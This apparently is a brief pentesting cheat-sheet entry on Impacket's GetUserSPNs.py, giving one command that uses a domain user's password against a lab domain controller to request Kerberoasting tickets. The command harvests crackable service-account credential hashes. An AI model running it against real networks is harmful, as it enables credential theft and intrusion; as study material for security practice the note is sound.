getuserspn

  • tool for getting kerberoasting tickets

installation

  • part of impacket

usage

get kerberoasting ticket

$ GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 192.168.122.33 -request

references